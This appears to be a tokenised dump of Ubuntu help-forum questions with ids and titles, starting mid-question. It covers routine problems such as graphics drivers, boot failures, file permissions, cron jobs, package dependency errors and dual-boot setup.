opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x300 ) opengl version string : 2.1 mesa 8.0.4 opengl shading language version string : 1.20 opengl extensions : and steam 's system information displays this : ( error , i do not have enough reputation to post a picture , the picture is near the top of the page of the first link that i posted . ) i believe the problem has to do with the contents of the /etc/ld.so.conf.d . in particular , there are two symbolic links in this folder : i386-linux-gnu_gl.conf - > /etc/alternatives/i386-linux-gnu_gl_conf and x86_64-linux-gnu_gl.conf - > /etc/alternatives/x86_64-linux-gnu_gl_conf cat i386-linux-gnu_gl.conf /usr/lib/i386-linux-gnu/mesa and cat x86_64-linux-gnu_gl.conf /usr/lib/x86_64-linux-gnu/mesa i 'm almost certain that this is the problem . /usr/lib/x86_64-linux-gnu/mesa is a folder . here are its contents : ls -l /usr/lib/x86_64-linux-gnu/mesa | grep -o `` l.* '' ld.so.conf libgl.so - > libgl.so.1 libgl.so.1 - > libgl.so.1.2 libgl.so.1.2 here are the contents of my /usr/lib : ls -l libgl* | grep -o lib . * libgl.la libgl.so - > libgl.so.1 libgl.so.1 - > libgl.so.310.32 libgl.so.310.32 here are the contents of my /usr/lib32 : ls -l libgl* | grep -o lib . * libgl.la libgl.so - > libgl.so.1 libgl.so.1 - > libgl.so.310.32 libgl.so.310.32 so i assumed i could fix this problem by changing to contents of i386-linux-gnu_gl.conf to just /usr/lib32 and the contents of x86_64-linux-gnu_gl.conf to just /usr/lib . unfortunately this causes glxinfo to mess up : glxinfo name of display : :0.0 x error of failed request : badwindow ( invalid window parameter ) major opcode of failed request : 137 ( nv-glx ) minor opcode of failed request : 4 ( ) resource id in failed request : 0x3e00003 serial number of failed request : 34 current serial number in output stream : 34 and steam segfaults . i feel like i 'm very close to fixing this issue ; i 'm just not sure what to do or where the best place to ask for help would be .
300331	can not change permission of a dir	i mounted a windows folder into my ubuntu so i could just drop my .torrent files //192.168.1.61/shared/torrent on /root/downloads/torrents type cifs ( rw ) but , whenever i put .torrent file inside my /torrent folder , i get this error [ /var/log/messages ] - watching `` /root/downloads/torrents '' for new .torrent files ( daemon.c:555 ) - using inotify to watch directory `` /root/downloads/torrents '' ( watch.c:73 ) - unable to watch `` /root/downloads/torrents '' : permission denied ( watch.c:79 ) so , i turned off the tranmission-daemon service and went inside ubuntu torrent files root @ media : ~/downloads # ls -l total 8 drwxrwxr-x 2 root debian-transmission 4096 may 26 20:28 complete drwxrwxr-x 2 root debian-transmission 4096 may 26 20:28 incomplete drwxr-xr-x 2 mark root 0 may 27 2013 torrents noticed that my torrent folder is not grouped with my root . so i issued this command root @ server # : usermod -a -g debian-transmission root root @ server # : chgrp -r debian-transmission /root/downloads/torrents root @ server # : -r 775 /root/downloads/torrents but it failed to modify the /torrent folder . root @ media : ~/downloads # ls -l total 8 drwxrwxr-x 2 root debian-transmission 4096 may 26 20:28 complete drwxrwxr-x 2 root debian-transmission 4096 may 26 20:28 incomplete drwxr-xr-x 2 mark root 0 may 27 2013 torrents < < -- - this in my windows folder i have allowed the shared folder to [ read/write/exec ] . so my question is , why cant i change the group and owner of my /root/download/torrents
300338	ca n't update anymore since the upgrade to 13.04 broke down	a few days ago i tried to upgrade from 12.10 to 13.04 but in the middle of the upgrade my computer shut down due to power problems in my house . after i booted my computer again there was a problem with broken packages so i repaired them using the repair mode in the grub menu . this all worked fine and i was able to update again , but after these updates i ca n't open update-manager anymore and a lot of features do n't work anymore . can someone help me please ?
300340	ubuntu 13.04 wo n't boot up hangs at purple screen	so after many months , i decided to completely remove windows 7 from my laptop and replace it with ubuntu . unfortunately , i got the common error of getting a hanging purple screen upon boot up . i could n't even turn off my computer , holding the power button for a minute did n't even work . ( i had to remove the battery from my laptop and unplug it . horrible , i know ) frustrated , i lurked around various forums and wikis ( such as this one ) . i did everything that could possibly effect my computer . i re-installed , typed in random commands under grub , etc . etc . however , after 15 attempts ( and counting ) , my computer sort of just pooped out . upon that purple screen , i ca n't even access the grub . so then i gave up and installed windows 7 again . big mistake . my computer is beyond repair right now . i boot up in windows ? i get the black screen of death complaining about a missing .sys file . boot up in ubuntu ? i ca n't do anything . booting off of flashdrives seems to work though . what should i do ? i am no tech-geek , ( but i am slowly headed in that direction ) so maybe i missed even the most basic thing . currently , my laptop is an hp-g72 . has and i3 , came pre-installed with windows 7 . it has no graphic card , and requires windows to install special drivers for properly display on the screen . any help would be beyond greatly appreciated . -norton
300345	compose key combinations are wrong in kde/qt apps	on kubuntu 12.04 lts . for some reason , qt applications ( kate , konsole , etc . ) were loading the iso8859-1 compose key file , instead of utf-8 . other applications ( chrome and java apps , for example ) were working correctly . you can tell if this is happening by typing the following key combination : < compose_key > then < underscore > then < a > if you get ä ( an a with a macron ) , you 're using the utf-8 file . if you get ăł ( an a with a tilde ) , you 're using the iso8859-1 file . the only way i figured out to fix the problem was to install qt4-qtconfig and change the `` default input method '' to xim instead of ibus . it must be that ibus is looking in the wrong spot for the console file . hope this helps someone else ( and i hope the qt developers fix the problem for qt5 ) .
300346	is it possible to do a full install of ubuntu/any distro to a flash drive ?	i 've tried this several times in the past , but none of them worked . first i tried doing it like a normal xubuntu 32 bit install ( i removed the hard drive of the computer i was installing it from ) using ubiquity , but it gave me some error . i googled it and it was because it wo n't install if it is tagged `` removable media '' . then i tried doing a full install in virtualbox , with a virtual disk the size of my flash drive , then imaging it and transferring the img file over ssh , so i could use dd to write it to the drive . this did n't work , and resulted in a weird partition setup . it obviously did n't work because the main partition was 256mbs and a swap of 15.75 gb . is there any easy way of doing this ? preferably with a ext2 file system to reduce writes , but that does n't matter all that much .
300352	ubuntu 13.04 install presents blinking cursor	i 'm trying to install ubuntu 13.04 , but am running into a specific issue , which i suspect may be a graphics issue , but am not sure . i 've downloaded the .iso , verified the md5sum , and burned it to a dvd , both on mac and lubuntu ( using brasero ) . i can boot from the cd , but i am required to hold/hit a key to enter the menu . however , when i try to install the new version of ubuntu ( i want a clean install ) it does nothing other than present a blinking cursor at the top left . i 've checked dmesg for any issues that arose , but am not seeing anything helpful . also , i ran a memory test , which showed no memory issues . i 'm currently running kernel 3.2.0-35-generic . my graphics card is ati m64-s , radeon x2300 . hp 6910p . thoughts on how to debug this or , ideally , what the issue might be ?
300356	how to upgrade ubuntu 12.10 to 13.04 using an .iso	i used wubi.exe to download and install ubuntu 12.10 , now i want to upgrade to ubuntu 13.04 . i have downloaded the iso image ( 13.04 ) on my windows os , want to upgrade to 13.04 using the iso and do n't not download and install it again on ubuntu 12.10 using the terminal . i need help . can anyone please suggest me a way ?
300366	executing a shell every minute using cron	i want to run this bash code every minute using cron . i saved it onto /root/activate.sh # ! /bin/bash for file in /home/user/torrents/*.torrent do if [ `` $ file '' ! = `` /home/user/torrents/*.torrent '' ] ; then echo [ `date` ] `` $ file '' added to queue . > > /var/log/torrentwatch.log /usr/bin/transmission-remote localhost:9091 -a `` $ file '' mv `` $ file '' `` $ file '' .added sleep 1 fi done permission is set -rwxrwxrwx 1 root root 278 may 27 01:27 activate.sh then inside my crontab -e i placed this * * * * * root sh /root/activate.sh the script does not execute and i get this log error may 27 01:40:02 media cron [ 3556 ] : ( root ) cmd ( root sh /root/activate.sh ) may 27 01:40:02 media cron [ 3555 ] : ( cron ) info ( no mta installed , discarding output ) -- -after a minute -- - may 27 01:41:01 media cron [ 3582 ] : ( root ) cmd ( root sh /root/activate.sh ) may 27 01:41:01 media cron [ 3581 ] : ( cron ) info ( no mta installed , discarding output )
300367	unable to change language	i have just installed ubuntu gnome 13.04 . i 'm trying to change the language ( system settings = > region & language ) , but only english is available and there is no way to add an another language in list . i suppose there is an another way , and i need help : ) .
300369	automatically checking system performance	is there any program out there for ubuntu that check system performances and specs ?
300377	which prog on xp to open lubuntu download	i want rid of xp and as my laptop is 7 years old i thought lubuntu would fit the bill.downloaded but ca n't find a programme on xp to open it .
300384	black screen when trying to install ubuntu ( dual boot ) from usb on asus f201e-kx065h	i 'm trying to install ubuntu in dual boot ( win 8 ) . i followed every step in this tutorial ( http : //doc.ubuntu-fr.org/uefi ) which has many similarities with this one ( installing ubuntu on a pre-installed uefi supported windows 8 system ) i do manage to get to the grub menu , however when selecting `` try ubuntu without installing '' or `` install ubuntu '' the screen is dimmed ( goes black ) and nothing happens . i have looked at various `` black screen '' answers on this site , none seem to fit my needs . config ( brand new ) asus f201e-kx065h + windows 8 - 64 bits graphic card : intel hd graphics steps deactivated secure boot , fast startup , as per tutorial + separate partition of 50gb downloaded linuxsecure ( 64 ) and burned it to a usb drive with linux live usb creator checksum : none available for linuxsecure , could n't verify also tried then ubuntu 12.04 64.iso and burned it to a usb drive with linux live usb at boot time , i pressed esc , selected `` uefi : hp v220w 1100 '' from boot device menu gnu grub version 2.00-7ubuntu11 > selected `` try ubuntu without installing '' or `` install ubuntu '' screen is then dimmed ( goes black ) and no apparent activity i press the power off button and then power on , computer boots , i can start back at step # 5 above i tried nomodeset fix that i found in one of the articles : in grub , i pressed 'e ' , replaced 'quiet splash ' by 'nomodeset ' , and booted = screen dimmed and nothing happened . grub menu for install ubuntu setparams 'install ubuntu' set gfxpayload=keep linux /casper/vmlinuz.efi.signed file=/cdrom/preseed/ubuntu.seed boot=casper only-ubiquity quiet splash -- initrd /casper/initrd.lz seems duplicate of this thread , but no solution is offered . ouch , just noticed another reported issue with asus f201 ( link ) suggestions anyone ?
300386	hp multimedia keyboard 5209 support	i have a keyboard with the hp logo on it , but when i try to get any info on it , it says model # 5209 & p/n 5187-3550 any suggestions ?
300389	ubuntu for phones - n9	as everybody know , few months ago , ubuntu for phones was released . there was a lot of questions about porting to n9 because n9-s swipe is inspired the os . i am just want to ask that there is no developer that is trying to port it ? donâ´t say its inposible because of a8 , i heard some other phones runing ubuntu for phones with a8 . http : //pocketnow.com/2013/03/05/ubuntu-phone-based-on-cyanogenmod if its true , drivers is already done in nitdroid . but on nitdroid ( phone call is working but no sound , wifi is working , sound is working , graphics drivers is good enough but not perfect ) so i think its possible to make a beta version for testing .
300392	duel boot ubuntu 12.04	im completely new to ubuntu and im trying to get my dual boot system to work . basically i have 2 hdds . a 500gb one for windows and a 2tb one for ubuntu . i installed ubuntu 12.04 64bit via a live usb , i followed a guide and created 4 partitions : /boot 500mb , / 15gb , swap 10gb , /home 100gb . side note : i would also like to set aside the remainder of the drive for duel access for both windows and ubuntu however the partitions create on the install wont let me make ntfs partitions i then set the install to install on the sdb drive as i dont want any sort of modification or 3rd party programs on the windows disk . when the installer restarted i set the boot order in bios to boot the 2nd hdd first . however it never seems to boot to ubuntu . i tried to force it to boot from the 2nd hdd and it just comes up with a `` insert boot cd '' error . any help would be greatly appreciated
300396	how to recover nice ubuntu boot screen ?	my computer starts normally , but i would like to recover nice ubuntu boot screen . grub is also working perfectly and from the moment i select option `` ubuntu 13.04 '' ( in the grub where all systems are listed ) i can not see boot screen ... the character `` _ '' blinks and after some time nvidia logo appears and system starts normally . this is the first few lines from the log file : may 24 20:17:01 xxx cron [ 2682 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) may 24 20:17:21 xxx colord : device removed : xrandr-seiko epson corporation may 24 20:17:21 xxx colord : profile removed : icc-1a481a1e08438b83bedb96e72eb42d3a may 24 20:17:24 xxx gnome-session [ 1854 ] : critical : gsm_manager_set_phase : assertion `gsm_is_manager ( manager ) ' failed may 24 20:17:24 xxx gnome-session [ 1854 ] : gtk-critical : gtk_main_quit : assertion `main_loops ! = null ' failed may 24 20:19:19 xxx kernel : imklog 5.8.11 , log source = /proc/kmsg started . may 24 20:19:19 xxx rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 931 '' x-info= '' http : //www.rsyslog.com '' ] start may 24 20:19:19 xxx rsyslogd : rsyslogd 's groupid changed to 103 may 24 20:19:19 xxx rsyslogd : rsyslogd 's userid changed to 101 may 24 20:19:19 xxx rsyslogd-2039 : could not open output pipe '/dev/xconsole ' [ try http : //www.rsyslog.com/e/2039 ]
300399	strange colors in image viewer and firefox	i 've recently stumbled upon incredibly irritating issue with color display in firefox and image viewer . some colors are just off , like red instead of blue etc . this problem does n't exist in chromium , or most other apps i 've been using . what is the cause and how to fix it ? -- ubuntu 13.04 64x
300401	how to fix ct-ng menuconfig `` failed to create symbolic link ‘config’ : permission denied make : * [ config ] error 1 '' when cross compiling for raspberry ?	i am currently trying to set up a cross compiler for raspberry pi using ubuntu 13.04 . i have been following the tutorial how to build a cross compiler for your raspberry pi . i am running into an error that i can not interpret or find any help with on google ) . and i am running into a problem when trying to run ct-ng menuconfig ( in step 2 of the second part ) . i am receiving the following error : matt @ ubuntu : /home/rpicc $ ct-ng menuconfig ln config ln : failed to create symbolic link ‘config’ : permission denied make : * [ config ] error 1 any ideas as to what this means ?
300406	theme issue after re-install unity in ubuntu 12.04	i tried to install unity 7.x in ubuntu 12.04 . but stuck in middle of the installation . as a result unity broke . trying after an hour i have successfully re-installed unity ( default version ) . affects : 1 . right context menu changes ( theme ) 2. drop down-box change in top panel ( theme ) 3. preview is not working in nautilus i re-installed ambiance theme and ubuntu-mono-dark icon set . other theme effects are good . edited : how to solve this ?
300407	nvidia-settings wo n't detect second monitor	i appreciate there are a lot of similar questions to this already but i ca n't seem to fix it following any current threads . i have installed 64bit ubuntu 13.04 and installed the nvidia drivers as per this thread : http : //www.dedoimedo.com/computers/ubuntu-quetzal-nvidia.html the drivers seem to be working correctly and i can access the nvidia-settings , but detect displays does not detect my second monitor ( actually an lg tv if it matters connected through hdmi ) from either nvidia-settings or the standard display option . some of the other threads mention editing the etc/x11/xorg.conf file but it does n't exist on my system , at that location at least . any help would be appreciated , and thanks in advance . rob
300408	when will developer.ubuntu.com review apps again ?	i submitted my first app into ubuntu software center , but i get this error : what does that error mean ? will my game get reviewed , or do i need to do something more ? edit : does anyone know when the site will be reviewing apps again ?
300411	best way to calibrate my camera ?	i really did n't notice ubuntu 's calibration option ever since i was used with precise pangolin . but what 's the best way to calibrate my camera ?
300414	loading ubuntu onto a second hand ibm server	i have an old eserver 325 ( ibm ) that i got second hand . it was n't wiped clean before i got it , but i do n't have the login details . i want to start fresh by loading up a new os , ubuntu . i saved a .iso file for ubuntu ( 32 bit ) onto a usb drive , stuck it in the server , hit f12 to get to the boot menu , and selected the removable device option . a black screen came up with a blinking line like in terminal/command line , but there was no text . the usb led started blinking quickly and regularly , but after ten minutes of this , nothing had changed . i was expecting it to come up with a screen asking me about settings like language , but i think something is wrong . any ideas on what the problem might be or how to fix it ? thanks !
300415	a functioning british spelling for libreoffice ?	by default , british dictionary corrects words such as color with colour and theater with theatre . but it does not recognise wrong spelling with z 's and s 's ( recognize vs recognise ) . i followed this , which fixes the z-s issue but breaks color , theater and many other words : how to set libreoffice to suggest corrections in english-uk in lubuntu 12.04 ? any fix that includes a complete british spelling check ?
300420	boot to old kernel : gpu driver issues	when booting 13.04 to the 3.5.0 kernel that came with 12.10 , the nvidia drivers seem to be playing up . screen resolution is not what it should be , and i ca n't set it to the correct resolution either . the `` nvidia x server settings '' tool gives the following error dialog : you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . however , running nvidia-xconfig as root does n't fix it . i tried both nvidia 's 310 driver ( which works on the default kernel ) and the 304 driver ( which used to work on 3.5 , ubuntu 12.10 ) , but no dice . gpu is an nvidia quadro fx570m . the reason i 'm booting to the old kernel is that i 'm encountering what appear to be processor scaling issues with the 3.8 ( and 3.9 ) kernels , which i do n't remember from the 3.5 kernel - which is why i want to try it out . edit : the nouveau driver seems to be having troubles as well now , reverting to 640 x 480 resolution on both the 3.5 and 3.9 kernels . something 's seriously messed up , is n't it ?
300421	which motherboard manufacture ( s ) are the most linux-friendly ?	i am looking to upgrade my motherboard to support ddr3 , usb 3.0 , and socket am3+ cpus . i have used gigabyte and asrock motherboards without any serious issues . i have been a fan of amd for years now and try to stick with them . which motherboard manufacture ( s ) are the most linux-friendly ?
300422	is it possible to check if my wireless network works 100 %	the last few days it seems like my wireless network ( on the laptop ) has a sort of latency . seems like it disconnect for a second or 2 and then connect again . i dont get a notification on it , but it just seems like that . example : steam - > cs : s refresh server-list the servers got a normal ping ( 40-90 ) and two refreshes later allmost 1500 ( ! ! ! ) for then to be normal again . and i can play in a game with a latency on 60 for then the next sec 300 and then 60 again . strange . it have n't been like this , just the last couple of days.. i also have a delay in connecting to the servers sometimes . and for those who plays , i get `` chokes '' and `` loss '' in-game . not much when spectating but when playing . is there a way to check the connection ? if theres a problem with it ? its not the broadband speed . ubuntu 12.10 64bit fujitsu lifebook ah532 running bumblebee ( with primus ) just fine.. or the last days when i start cs : s theres some messages in console that i dont understand : p any more info you have to tell me ... difficult to explain , just frustrating !
300423	how to auto mount ntfs part/disks in ubuntu ( 13.04 ) with a gui tool	the header says it all . how to auto mount ntfs partitions/disks in ubuntu 13.04 with a gui tool ? !
300431	how to rotate h264 video ?	i 've tried the following : $ avconv -i in.mov -codec : video copy -codec : audio copy -filter transpose=clock out.mov avconv version 0.8.6-6:0.8.6-1ubuntu2 , copyright ( c ) 2000-2013 the libav developers built on mar 30 2013 22:23:21 with gcc 4.7.2 input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'in.mov ' : metadata : major_brand : qt minor_version : 537331968 compatible_brands : qt caep creation_time : 2013-03-03 15:47:47 duration : 00:00:18.97 , start : 0.000000 , bitrate : 45882 kb/s stream # 0.0 ( eng ) : video : h264 ( constrained baseline ) , yuvj420p , 1920x1080 , 44343 kb/s , 23.98 fps , 23.98 tbr , 24k tbn , 48k tbc metadata : creation_time : 2013-03-03 15:47:47 stream # 0.1 ( eng ) : audio : pcm_s16le , 48000 hz , stereo , s16 , 1536 kb/s metadata : creation_time : 2013-03-03 15:47:47 output # 0 , mov , to 'out.mov ' : metadata : major_brand : qt minor_version : 537331968 compatible_brands : qt caep creation_time : 2013-03-03 15:47:47 encoder : lavf53.21.1 stream # 0.0 ( eng ) : video : avc1 / 0x31637661 , yuvj420p , 1920x1080 , q=2-31 , 44343 kb/s , 24k tbn , 24k tbc metadata : creation_time : 2013-03-03 15:47:47 stream # 0.1 ( eng ) : audio : pcm_s16le , 48000 hz , stereo , 1536 kb/s metadata : creation_time : 2013-03-03 15:47:47 stream mapping : stream # 0:0 - > # 0:0 ( copy ) stream # 0:1 - > # 0:1 ( copy ) press ctrl-c to stop encoding frame= 455 fps=379 q=-1.0 lsize= 106291kb time=18.94 bitrate=45983.9kbits/s video:102724kb audio:3558kb global headers:0kb muxing overhead 0.008270 % the resulting out.mov plays just fine , but the video is not rotated . i 've tried many different filters : transpose=1 rotate=1 rotate=clock all with the same result .
300434	where is the /etc/login.conf file in ubuntu 12.10 and latest ?	where is the file for the general login for to configure it ? /etc/login.conf seems to be outdated in 12.10 ? i want to adjust maximum number of login attempts . e.g . in sudo from 3 to 1. same for kdm , gdm , lightdm and for command su . is there a general file for all login-queries ?
300435	dual boot windows 7 and ubuntu on an acer aspire ultrabook s3-391	i am new to ubuntu and would like to buy an acer s3-391-53314g52 with windows 7 ( has a 20gb ssd and 500gb hdd ) and would like to install ubuntu in dual boot mode . has anybody experience with the hardware and know if it will work ? anything to be careful about ?
300436	cups color & black and white	yesterday i set up cups to turn a usb printer into a network printer . all of the print jobs are being sent to the server from windows and it 's working great except for one problem . when i set the color option in windows , it prints in color . when i set it to black and white in windows , it still prints in color . when i modify the settings for the printer in cups i can set the color mode : to either color or monochrome . how can it simply get the color mode dynamically from windows ?
300441	wedge with apt-get	i get the following error message the following packages have unmet dependencies : fuse-utils : depends : libfuse2 ( = 2.8.4-1.3 ) but 2.9.2-4 is installed gvfs : depends : gvfs-daemons ( > = 1.16.2-2 ) but it is not installed depends : gvfs-daemons ( < 1.16.2-2.1~ ) but it is not installed depends : gvfs-libs ( = 1.16.2-2 ) but it is not installed gvfs-backends : depends : gvfs ( = 1.6.1-0ubuntu1build1 ) but 1.16.2-2 is installed libfuse-dev : depends : libfuse2 ( = 2.8.4-1.3 ) but 2.9.2-4 is installed python-apt : depends : python ( > = 2.7 ) but 2.6.6-13 is installed i have n't got a clue how to proceed . simply removing these packages creates a cascade of pain . this was marked as a duplicate . i 'm pretty sure i tried all of those suggestions . making forward progress seems to require identifying what package to remove . removing gvfs , gvfs-backends , libfuse-dev , python-apt all lead to cascading problems . under ubuntu software tab , enable all the repositories . -- this is a headless server , there is no gui sudo apt-get clean -- does n't help sudo apt-get -f install -- does n't help sudo dpkg -- configure -a then run this again : sudo apt-get -f install does n't help sudo apt-get -u dist-upgrade -- does n't help sudo apt-get -o debug : :pkgproblemresolver=yes dist-upgrade -- - e : unmet dependencies . try using -f. disabling a ppa means no more updates for the packages installed from that ppa . to disable a ppa : open software center > edit > software sources or , -- again headless server , no gui sudo apt-get install ppa-purge -- wo n't run because of existing errors i 'm looking for new suggestions . the standard one 's are n't working . my /etc/apt/sources.list .
300443	will modprobe automatically switch loadable kernel modules ?	i have hybrid graphics consists of nvidia geforce graphics and intel hd graphics . if i remove nvidia geforce , can modprobe switch vga lkm from nouveau to intel automatically on startup ?
300447	common terminal commands	for example , does it exist a terminal command i can use to `` clean '' the pc from time to time ? to definitely delete old kernels and packages , for example ... and when/how i can run it ? thank you !
300448	can not connect to virtualbox vm from kubuntu host using nat	im using kubuntu 13 as host and xubuntu 12 as guest . in vm network options i have nat selected , and port forwarding options like 127.0.0.1:23 = > 10.0.2.15:22 . i can access internet from guest , but when im trying to connect via ssh to guest i get connection refused . recently i used this setup on windows 7 with success - no idea why it cant work on ubuntu . kindly help ! : )
300453	13.04 system ui fonts subbed with random serif font	after upgrading to 13.04 , the first thing i noticed was that the neat window title font ( and all the other default system fonts i 'd enjoyed ) were replaced with other fonts . also , the terminal font has really messed up spacing and is definitely not the font it 's supposed to be . i checked the system settings , and even tweak said the fonts were n't serif ... .why is this ? ( tried uninstalling tweak ; now the `` appearance/behavior '' settings group is n't even available . )
300457	is there an openshift charm ?	i saw that you have a charm for cloudfoundry . is someone writing a charm to install openshift origin ( red hat 's paas ) say on free versions of rhel like scientific linux or centos ? i am interested in learning juju but my software of interest is openshift origin . thanks .
300458	dell inspiron custom buttons	i have a dell inspiron 14r that out of the box came out with ubuntu 11.1 . ass suggested here , i upgraded it to ubuntu 12.04 . my laptop keyboard has three funny buttons in the upper-left corner . according to the manual , they are : dell instant launch button dell audio with preset switch button windows mobility center button they do nothing when i press them , and by the name they seem windows-oriented . i want to know if they have some utility in ubuntu , and if they not if i can made them useful by some way ( maybe launching some equivalent ubuntu packages )
300459	ubuntu grub is replaced by fedora grub2	i had upgraded kernel of ubuntu 12.04.2 lts and fedora 18 to the latest update . i had updated the ubuntu 's grub with command $ sudo update-grub when i updated the grub , i had mounted fedora 's partition . however , fedora 's grub2 take over bootloader . how should i do to make ubuntu 's grub taking over the bootloader ?
300460	kernel panic after waking on suspend with flashing caps lock	i have a hp 2133 laptop which crashes after suspend but only while on battery power . i 'm completely new to ubuntu and am not familiar with how to debug and stuff like that . i 've searched online forums and found some answers to similar issues but i have n't been able to do anything about it . for example to revert to virualbox 4.0.. have checked in bum but has not found this program/script in startup so i cant revert it . also , the power button in the top right corner of the screen seems not to respond to when i click it . this happened after going into the sudo nano and adding some lines to be able to use hibernation on my system as described here : how to enable hibernation ?
300463	can i get gimp manual instruction offline ?	can i get gimp manual instruction offline ?
300466	unable to connect to wireless ad-hoc network in 12.04	i run an app on my android smartphone that runs a wep-encrypted ad-hoc network ( so my laptop can get wireless internet through my phone 's data plan ) . i can connect to this ad-hoc network without problem in windows on this same computer , and it also worked when i used to run ubuntu 10.10 on this computer . i recently installed ubuntu 12.04 ( clean install , not upgrade ) , and now when i try to connect to the ad-hoc network through ubuntu , it just keeps asking me for the network 's passphrase and never connects . moreover , once i 've attempted to connect to this ad-hoc network , i can not connect to any other wireless network until i reboot . the computer in question is a lenovo thinkpad t410 with a realtek rtl8191sevb wireless lan controller card .
300467	where 's my win8 go ?	got a brand new fujitsu lifebook ah532 laptop with win8 pre-installed.. yeah , right.. first thing i did was to install ubuntu 12.10 64bit.. disabled `` secure boot '' in settings and voila ! well , the ubuntu installation did n't see my win8 partition , so i created a new partition-table to use with ubuntu . so far so good . after installation completed successfully , i ran `` boot-repair '' from the live usb . got the grub on boot ( booted directly to win8 first ) and could boot ubuntu . next thing in grub menu is ubuntu advanced settings and system settings . at this point i did n't think about it because i wanted to only use ubuntu . when i decided to boot win8 ( for fun ) i select `` system setting '' in the grub and i get into `` bios '' . there i go to `` boot '' section and select `` windows boot something '' and restarts . now i got the grub menu again . in bios again i enabled `` secure boot '' , then i got som failure boot thing.. so i changed back to normal again . my hdd is 500gb , and ca 40gb do n't show in gparted , is there a chance that this is win8 ? cant see it.. or have i deleted win8 completely ? ? i dont care , just want to know..
300475	what are steps to set up oracle java ee 6 sdk in ubuntu ?	what are steps to set up oracle java ee 6 sdk ?
300477	terminal video player	i am looking for nice terminal based video player for my ubuntu 12.04 xmonad desktop . i would like to make custom scripts for this player is it 's possible . can you recommend some ?
300479	why ca n't i install the java jdk	i ran the script here : https : //github.com/flexiondotorg/oab-java6/blob/master/oab-java.sh and it succeed . but why do i get : ryan @ palms ~ $ /usr/lib/jvm/java-6-openjdk/bin/java -version java version `` 1.7.0_07 '' openjdk runtime environment ( icedtea7 2.3.2 ) ( 7u7-2.3.2a-1ubuntu1 ) openjdk server vm ( build 23.2-b09 , mixed mode )
300481	ubuntu 13.04 system76 fullscreen overcome by a bar	i have this bar on my fullscreen apps . how do i get rid of it ? i am running the latest ubuntu . the picture is fullscreen hulu :
300482	an error occurred , please run package manager	i have just upgraded my dell inspiron 1545 laptop from ubuntu 12.04 to 13.04 . unfortunately the top bar now has a little red circle with a minus sign in it . when i click it , it opens a box with the following message in it : an error occurred , please run package manager from the right-click from the right click window or apt-get in a terminal to see what is wrong . the error message was : 'unknown error : '' ( e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it . ) 'this usually means that you have > installed packages with unmet dependencies i do n't have a lot of experience using ubuntu , or linux in general , and i do n't know what this means . it sounded to me like some kind of google chrome error . i had downloaded and installed google chrome only a few minutes before . i ran apt-get in the terminal but it did n't do anything , and i had no idea what run the package manager from the right click window meant . google chrome and the geany ide are the only sofware i have installed since installing linux . the computer seems to be running perfectly fine . do you have any suggestions on what i should do ? the results from : sudo apt-get -f install are : e : the package google-chrome-stable needs to be reinstalled , but i ca n't find an archive for it .
300487	how to configure ssh authentication with ldap without password	i need to setup ssh authtication with ldap without using password like amazon ec2 instance with pam file . also if i need to use this with multiple servers , how can i configure that ?
300488	internal drive sdc sometimes mounts , but sometimes fails to mount and is assigned sda	i am using ubuntu 13.04 ( kubuntu if it matters ) and i have it set up to mount hard drives automatically on start-up ( in system settings under `` removable devices '' , i have the setting `` enable automatic mounting of removable media '' checked as well as `` mount all removable media '' ) . i have three drives in my system . the first drive ( sda ) has a windows 7 partition and an extended partition containing the ubuntu partitions . the second drive ( sdb ) has a single ntfs partition . the third drive ( sdc ) also has a single ntfs partition ( it is a newish 3tb seagate st3000dm001 ) . sometimes everything seems to work fine , though fdisk -l shows some potential problems issues with the third drive : warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . sometimes this drive mounts fine ( and despite those messages in fdisk ) seems to work fine . but sometimes it just does n't mount on start-up ( i have n't determined the conditions under which this happens ) . in those cases , fidsk -l shows the same exact details for the drive except for some reason lists the drive as sda ( and assigns the actual first drive as sdb and the actual second drive as sdc ) . in this case , i 've been just rebooting until the mount succeeds ( it seems about 50/50 ) . the author of this related question also had the message about not starting on a physical sector boundary , but this may be completely orthogonal to my issue ( for that question the mount never failed , and according to the accepted answer it is more of a warning than an error and does n't even need to be fixed ) . it 's also important to note than when i boot up to windows 7 , the drive always mounts as the third drive and never shows any problems , so i do n't think it 's a fundamental problem with the drive or the partitioning , but rather a problem with ubuntu 's mounting procedure . any idea how to fix this ? should i add the drives /etc/fstab ? ( right now only ubuntu 's root , boot , and swap are in there and i 'm using auto-mounting for all my ntfs partitions ) do you need any more details about my system to determine the cause ?
300493	how to request if some of the package is out of date	ubuntu is famous for it 's updated software package , but sometimes the package is out of date . for eg : http : //packages.ubuntu.com/search ? keywords=zabbix-server-mysql , the version is 1.8.x which is release at 2011 . now they have a new version and i want to upgrade .
